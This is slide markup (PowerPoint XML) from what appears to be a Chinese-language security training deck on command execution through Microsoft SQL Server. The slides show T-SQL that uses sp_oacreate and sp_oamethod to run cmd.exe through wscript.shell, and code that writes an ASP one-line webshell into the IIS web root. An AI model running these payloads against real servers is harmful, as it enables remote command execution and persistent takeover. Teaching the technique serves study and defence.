              </a:rPr>
              <a:t>和</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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>两个过程分别用来创建和执行脚本语言。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>存储过程调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wscript.shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>可执行命令无回显，若存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>环境可写入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目录或反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519014" y="4588989"/>
            <a:ext cx="4455713" cy="1600432"/>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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>declare @shell int exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wscript.shell',@shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> output exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @shell,'run',null,'c:\windows\system32\cmd.exe /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> &gt; c:\\1.txt'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>定义变量 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wscript.shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmd.exe /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>执行命令并写入文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C44C04-79A6-4EC8-BBA2-3FEA9269923A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5498642" y="4807740"/>
            <a:ext cx="6501525" cy="1162929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26497192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1"/>
            <a:ext cx="11035409" cy="2339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系统存储过程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系统存储过程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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</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开头，进行系统的设定。如：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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</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sp_oamethod</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sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的实例。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rPr>
              <a:t>组合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>和</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sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470049" y="4008981"/>
            <a:ext cx="4729912" cy="1600432"/>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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>declare @o int, @f int, @t int, @ret int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oacreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>scripting.filesystemobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', @o out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @o, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>createtextfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', @f out, 'c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\shell.asp', 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec @ret = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> @f, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>writeline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', NULL,'&lt;%execute(request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>"))%&gt;'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
